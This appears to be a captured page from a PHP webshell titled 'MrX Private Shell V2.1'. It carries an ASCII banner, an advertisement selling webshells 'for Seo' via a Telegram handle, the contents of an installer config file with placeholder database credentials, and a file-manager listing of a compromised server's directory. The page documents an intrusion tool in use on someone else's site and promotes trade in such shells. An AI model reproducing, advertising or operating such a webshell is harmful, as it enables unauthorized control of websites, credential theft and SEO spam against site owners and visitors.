__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
#Show Error
define('APP_SHOW_ERROR', true);
@ini_set('display_errors', (APP_SHOW_ERROR) ? 'On' : 'Off');
error_reporting(E_ALL & ~E_NOTICE & ~E_STRICT);
if(defined('E_DEPRECATED')) {
error_reporting(error_reporting() & ~E_DEPRECATED);
}
if(function_exists('phpversion')){
if(version_compare(phpversion(),'8.0.0','>=')){
error_reporting(error_reporting() & ~E_WARNING);
define('IWP_PHP8',true);
}
}
define('SHOW_SQL_ERROR', APP_SHOW_ERROR);
define('APP_VERSION', '3.5.2');
define('APP_INSTALL_HASH', '[[APP_INSTALL_HASH]]');
define('APP_ROOT', dirname(__FILE__));
define('APP_DOMAIN_PATH', '[[softurl_no_http]]/');
define('APP_V3', 1);
define('APP_ROOT_V2', dirname(__FILE__));
define('APP_DOMAIN_PATH_V2', '[[softurl_no_http]]/');
define('EXECUTE_FILE', 'execute.php');
define('DEFAULT_MAX_CLIENT_REQUEST_TIMEOUT', 180);//Request to client wp
$config = array();
$config['SQL_DATABASE'] = '[[softdb]]';
$config['SQL_HOST'] = '[[softdbhost]]';
$config['SQL_USERNAME'] = '[[softdbuser]]';
$config['SQL_PASSWORD'] = '[[softdbpass]]';
$config['SQL_PORT'] = '3306';
$config['SQL_TABLE_NAME_PREFIX'] = '[[dbprefix]]';
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| images | Folder | 0755 |
|
|
| php53 | Folder | 0755 |
|
|
| php56 | Folder | 0755 |
|
|
| php71 | Folder | 0755 |
|
|
| php81 | Folder | 0755 |
|
|
| php82 | Folder | 0755 |
|
|
| clone.php | File | 4.76 KB | 0644 |
|
| config.php | File | 1.1 KB | 0644 |
|
| edit.php | File | 4.36 KB | 0644 |
|
| edit.xml | File | 447 B | 0644 |
|
| fileindex.php | File | 281 B | 0644 |
|
| import.php | File | 3.21 KB | 0644 |
|
| info.xml | File | 2.18 KB | 0644 |
|
| install.js | File | 921 B | 0644 |
|
| install.php | File | 4.68 KB | 0644 |
|
| install.xml | File | 1.09 KB | 0644 |
|
| md5 | File | 1.37 KB | 0644 |
|
| notes.txt | File | 818 B | 0644 |
|